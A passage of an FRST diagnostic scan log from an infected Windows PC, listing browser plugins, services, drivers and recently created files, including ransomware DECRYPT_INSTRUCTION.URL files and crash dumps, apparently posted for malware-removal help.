Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation) DPF: HKLM-x32 {0D41B8C5-2599-4893-8183-00195EC8D5F9} http://support.asus.com/select/asusTek_sys_ctrl3.cab DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://blueconnect.jetblue.com/dana-cached/sc/JuniperSetupClient.cab Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation) Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation) Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62 FireFox: ======== FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.) FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google) FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) Chrome: ======= CHR HomePage: Default -> hxxp://www.google.com CHR StartupUrls: Default -> "hxxp://www.google.com" CHR Profile: C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Drive) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-16] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-13] CHR Extension: (DoNotTrackMe: Online Privacy Protection) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\epanfjkfahimkgomnigadpkobaefekcd [2014-07-18] CHR Extension: (iCloud Bookmarks) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkepacicchenbjecpbpbclokcabebhah [2014-10-03] CHR Extension: (Hide My Ass) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmjonpeiaiacbgfgemlchebljmfgjnmh [2014-07-18] CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-06] CHR Extension: (WeatherBug) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2014-07-18] CHR Extension: (Google Wallet) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-01] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] () R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation) R2 ekrn; C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe [1349576 2014-10-01] (ESET) R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-07-23] (Garmin Ltd or its subsidiaries) R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2014-11-06] (NVIDIA Corporation) S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed] R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) [File not signed] R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1795912 2014-11-06] (NVIDIA Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19819848 2014-11-06] (NVIDIA Corporation) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R0 asahci64; C:\Windows\System32\DRIVERS\asahci64.sys [47512 2013-01-10] (Asmedia Technology) R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2012-08-21] () R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation) R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [243440 2014-08-18] (ESET) U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [241368 2014-08-18] (ESET) R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [169280 2014-08-18] (ESET) R2 epfw; C:\Windows\System32\DRIVERS\epfw.sys [222280 2014-08-18] (ESET) R1 EpfwLWF; C:\Windows\System32\DRIVERS\EpfwLWF.sys [44632 2014-08-18] (ESET) R0 epfwwfp; C:\Windows\System32\DRIVERS\epfwwfp.sys [63160 2014-09-18] (ESET) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-11] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2014-11-06] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38216 2014-10-03] (NVIDIA Corporation) R3 SaiH075C; C:\Windows\System32\DRIVERS\SaiH075C.sys [326784 2006-07-27] (Saitek) S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-11 21:37 - 2014-11-11 21:37 - 00019905 _____ () C:\Users\Swintal\Desktop\FRST.txt 2014-11-11 21:07 - 2014-11-11 21:07 - 00292944 _____ () C:\Windows\Minidump\111114-30482-01.dmp 2014-11-11 16:20 - 2014-11-11 21:37 - 00000000 ____D () C:\FRST 2014-11-11 16:15 - 2014-11-11 16:16 - 00292784 _____ () C:\Windows\Minidump\111114-55255-01.dmp 2014-11-11 15:42 - 2014-11-11 15:42 - 00292944 _____ () C:\Windows\Minidump\111114-28922-01.dmp 2014-11-11 15:36 - 2014-11-11 15:36 - 02116096 _____ (Farbar) C:\Users\Swintal\Desktop\FRST64.exe 2014-11-11 15:25 - 2014-11-11 21:37 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-11-11 15:24 - 2014-11-11 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-11-11 15:24 - 2014-11-11 21:24 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-11-11 15:24 - 2014-11-11 15:24 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Swintal\Downloads\mbam-setup-2.0.3.1025.exe 2014-11-11 15:24 - 2014-11-11 15:24 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-11-11 15:24 - 2014-11-11 15:24 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-11 15:24 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-11-11 15:24 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-11-11 15:24 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-11-11 15:07 - 2014-11-11 15:08 - 122472704 _____ (Microsoft Corporation) C:\Users\Swintal\Downloads\msert.exe 2014-11-11 14:51 - 2014-10-03 14:23 - 00038216 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys 2014-11-11 14:51 - 2014-10-03 14:23 - 00032584 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll 2014-11-11 13:41 - 2014-11-11 13:41 - 00292968 _____ () C:\Windows\Minidump\111114-28407-01.dmp 2014-11-11 13:34 - 2014-11-11 13:34 - 00000000 __SHD () C:\found.003 2014-11-11 13:07 - 2014-11-11 13:07 - 00000268 _____ () C:\Users\Swintal\DECRYPT_INSTRUCTION.URL 2014-11-11 13:00 - 2014-11-11 13:00 - 00000268 _____ () C:\Users\Swintal\Downloads\DECRYPT_INSTRUCTION.URL 2014-11-11 12:41 - 2014-11-11 12:41 - 00000268 _____ () C:\Users\Swintal\Documents\DECRYPT_INSTRUCTION.URL 2014-11-11 12:39 - 2014-11-11 12:39 - 00000268 _____ () C:\Users\Swintal\AppData\Roaming\DECRYPT_INSTRUCTION.URL 2014-11-11 12:39 - 2014-11-11 12:39 - 00000268 _____ () C:\Users\Swintal\AppData\DECRYPT_INSTRUCTION.URL 2014-11-11 12:38 - 2014-11-11 12:38 - 00000268 _____ () C:\Users\Swintal\AppData\Local\DECRYPT_INSTRUCTION.URL 2014-11-11 12:36 - 2014-11-11 12:36 - 00000268 _____ () C:\Users\Swintal\AppData\Local\Apps\DECRYPT_INSTRUCTION.URL 2014-11-11 12:35 - 2014-11-11 12:35 - 00000268 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL 2014-11-11 12:35 - 2014-11-11 12:35 - 00000268 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL 2014-11-11 12:34 - 2014-11-11 12:34 - 00000268 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL 2014-11-11 12:09 - 2014-11-11 14:47 - 00000000 ___HD () C:\84c4f78 2014-11-11 11:33 - 2014-11-11 21:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Blue 2014-11-11 11:33 - 2014-11-11 11:33 - 00003065 _____ () C:\Users\Swintal\Desktop\bluCARS.lnk 2014-11-11 08:24 - 2014-11-11 08:24 - 00292968 _____ () C:\Windows\Minidump\111114-26566-01.dmp 2014-11-11 07:56 - 2014-11-11 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FS2Crew2012 2014-11-11 07:56 - 2014-11-11 21:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\RAASPRO 2014-11-09 20:19 - 2014-11-09 20:19 - 00039296 _____ () C:\Users\Swintal\Downloads\lizzys-support-materials.zip 2014-11-09 14:07 - 2014-11-11 12:09 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-11-09 11:40 - 2014-11-09 11:40 - 00262144 _____ () C:\Windows\Minidump\110914-52541-01.dmp 2014-11-07 17:50 - 2014-11-07 17:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud 2014-11-07 17:49 - 2014-11-07 17:49 - 00001452 _____ () C:\Users\Public\Desktop\iTunes.lnk 2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7 2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\Program Files\iTunes 2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\Program Files\iPod 2014-11-07 11:00 - 2014-11-07 11:00 - 00000222 _____ () C:\Users\Swintal\Desktop\Ultimate General Gettysburg.url 2014-11-07 10:31 - 2014-11-07 10:43 - 3016997751 _____ (DarthMod Productions) C:\Users\Swintal\Downloads\DarthModEmpirev80Platinuma.exe 2014-11-05 10:16 - 2014-11-11 12:34 - 00000000 ____D () C:\ProgramData\Stardock 2014-11-05 10:16 - 2014-11-05 10:16 - 00000000 ____D () C:\Users\Swintal\Documents\My Games 2014-11-05 10:15 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll 2014-11-05 10:15 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll 2014-11-05 10:15 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll 2014-11-05 10:15 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll 2014-11-05 10:15 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll 2014-11-05 10:15 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll 2014-11-05 10:12 - 2014-11-11 12:54 - 00000000 ____D () C:\Users\Swintal\Downloads\PoliticalMachine2012 2014-11-05 10:12 - 2014-11-05 10:12 - 00001089 _____ () C:\Users\Swintal\Desktop\Cheat Engine.lnk 2014-11-05 10:12 - 2014-11-05 10:12 - 00000000 ____D () C:\Users\Swintal\Documents\My Cheat Tables 2014-11-05 10:12 - 2014-11-05 10:12 - 00000000 ____D () C:\Program Files (x86)\Cheat Engine 6.4 2014-11-05 10:11 - 2014-11-05 10:11 - 09052192 _____ (Cheat Engine ) C:\Users\Swintal\Downloads\CheatEngine64.exe 2014-11-05 10:10 - 2014-11-05 10:10 - 02527824 _____ () C:\Users\Swintal\Downloads\PoliticalMachine2012.rar 2014-11-05 10:08 - 2014-11-05 10:08 - 00000222 _____ () C:\Users\Swintal\Desktop\The Political Machine 2012.url 2014-11-05 08:17 - 2014-11-11 12:51 - 00000000 ____D () C:\Users\Swintal\Downloads\FSXP3D_WorldNavaids 2014-11-05 08:16 - 2014-11-05 08:16 - 08906528 _____ () C:\Users\Swintal\Downloads\FSXP3D_WorldNavaids.zip 2014-11-05 06:32 - 2014-11-11 12:41 - 00000000 ____D () C:\Users\Swintal\Downloads\AS_Airport-Enhancement-Services_V237 2014-11-04 16:54 - 2014-11-04 16:54 - 00292960 _____ () C:\Windows\Minidump\110414-20139-01.dmp 2014-11-04 11:47 - 2014-11-04 11:48 - 79920816 _____ () C:\Users\Swintal\Downloads\AS_Airport-Enhancement-Services_V237.zip 2014-11-02 07:48 - 2014-11-02 07:48 - 00001417 _____ () C:\Users\Brian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-11-02 07:48 - 2014-11-02 07:48 - 00000000 ____D () C:\Users\Brian\AppData\Roaming\Adobe 2014-11-02 07:47 - 2014-11-09 11:36 - 00000000 ____D () C:\Users\Brian\AppData\Local\NVIDIA Corporation 2014-11-02 07:47 - 2014-11-02 07:48 - 00000000 ____D () C:\Users\Brian\AppData\Local\Google 2014-11-02 07:47 - 2014-11-02 07:48 - 00000000 ____D () C:\Users\Brian 2014-11-02 07:47 - 2014-11-02 07:47 - 00000020 ___SH () C:\Users\Brian\ntuser.ini 2014-11-02 07:47 - 2014-11-02 07:47 - 00000000 ____D () C:\Users\Brian\AppData\Local\VirtualStore 2014-11-02 07:47 - 2014-11-02 07:47 - 00000000 ____D () C:\Users\Brian\AppData\Local\NVIDIA 2014-11-02 07:47 - 2014-04-10 05:12 - 00000000 ____D () C:\Users\Brian\AppData\Roaming\Garmin 2014-11-02 07:47 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\Brian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories 2014-11-02 07:47 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\Brian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance 2014-11-01 19:56 - 2014-11-01 19:56 - 00292960 _____ () C:\Windows\Minidump\110114-24492-01.dmp 2014-11-01 17:39 - 2014-11-11 12:42 - 00000000 ____D () C:\Users\Swintal\Downloads\AS_MEGA-AIRPORT-LONDON-HEATHROW-XTENDED_FSX 2014-11-01 17:12 - 2014-11-01 17:32 - 58954784 _____ () C:\Users\Swintal\Downloads\AS_MEGA-AIRPORT-LONDON-HEATHROW-XTENDED_FSX.zip 2014-11-01 16:33 - 2014-11-01 16:34 - 222931074 _____ () C:\Users\Swintal\Downloads\FlyTampa_Athens_FSX_P3D_12.exe 2014-11-01 14:50 - 2014-11-01 14:50 - 00292960 _____ () C:\Windows\Minidump\110114-36644-01.dmp 2014-11-01 10:47 - 2014-11-11 12:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Hifi 2014-11-01 10:47 - 2014-11-01 10:47 - 00001112 _____ () C:\Users\Swintal\Desktop\Active Sky Next for FSX SP1B.lnk 2014-11-01 10:47 - 2014-11-01 10:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HiFi 2014-11-01 10:47 - 2014-11-01 10:47 - 00000000 ____D () C:\Program Files (x86)\HiFi 2014-11-01 08:49 - 2014-11-01 08:50 - 00000000 ____D () C:\Program Files (x86)\QuickTime 2014-11-01 08:49 - 2014-11-01 08:49 - 00001845 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk 2014-11-01 08:49 - 2014-11-01 08:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime 2014-10-26 14:52 - 2014-10-26 14:59 - 159554687 _____ () C:\Users\Swintal\Downloads\EJets_FSX_v16.exe 2014-10-26 09:21 - 2014-10-26 09:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\United Virtual Airlines 2014-10-26 09:21 - 2014-10-26 09:21 - 00000000 ____D () C:\Program Files (x86)\United Virtual Airlines 2014-10-26 09:19 - 2014-10-26 09:20 - 31212496 _____ () C:\Users\Swintal\Downloads\acars_v3.3.15B.zip 2014-10-26 08:38 - 2014-10-26 08:38 - 00292960 _____ () C:\Windows\Minidump\102614-19359-01.dmp 2014-10-25 16:42 - 2014-10-25 16:42 - 00292968 _____ () C:\Windows\Minidump\102514-23150-01.dmp 2014-10-25 10:06 - 2014-10-25 10:06 - 00000000 __SHD () C:\found.002 2014-10-25 09:06 - 2014-11-11 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET 2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\ESET 2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\Users\Swintal\AppData\Local\ESET 2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\ProgramData\ESET 2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\Program Files\ESET 2014-10-25 09:00 - 2014-10-25 09:00 - 01661128 _____ (ESET) C:\Users\Swintal\Downloads\eset_smart_security_live_installer.exe 2014-10-25 08:28 - 2014-10-25 08:28 - 03834608 _____ (Catalina Marketing Corp) C:\Users\Swintal\Downloads\CatalinaSavingsPrinter.exe 2014-10-25 08:23 - 2014-10-25 08:23 - 00292936 _____ () C:\Windows\Minidump\102514-31715-01.dmp 2014-10-21 08:07 - 2014-10-21 08:07 - 00292920 _____ () C:\Windows\Minidump\102114-18330-01.dmp 2014-10-17 02:01 - 2014-10-17 02:01 - 00000000 ____D () C:\Program Files (x86)\Microsoft ASP.NET 2014-10-16 18:55 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-10-16 18:55 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll 2014-10-16 18:55 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-10-16 18:55 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-10-16 18:55 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2014-10-16 18:55 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-10-16 18:55 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-10-16 18:55 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2014-10-16 18:55 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2014-10-16 18:55 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2014-10-16 18:55 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2014-10-16 18:55 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2014-10-16 18:55 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-10-16 18:55 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-10-16 18:55 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-10-16 18:55 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2014-10-16 18:55 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2014-10-16 18:55 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-10-16 18:55 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-10-16 18:55 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2014-10-16 18:55 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2014-10-16 18:55 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2014-10-16 18:55 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-10-16 18:55 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-10-16 18:55 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2014-10-16 18:55 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-10-16 18:55 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-10-16 18:55 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2014-10-16 18:55 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2014-10-16 18:55 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2014-10-16 18:55 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2014-10-16 18:55 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2014-10-16 18:55 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-10-16 18:55 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2014-10-16 18:55 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2014-10-16 18:55 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2014-10-16 18:55 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2014-10-16 18:55 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2014-10-16 18:55 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-10-16 18:55 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2014-10-16 18:55 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-10-16 18:55 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2014-10-16 18:55 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2014-10-16 18:55 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2014-10-16 18:55 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2014-10-16 18:55 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2014-10-16 18:55 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2014-10-16 18:55 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-10-16 18:55 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) 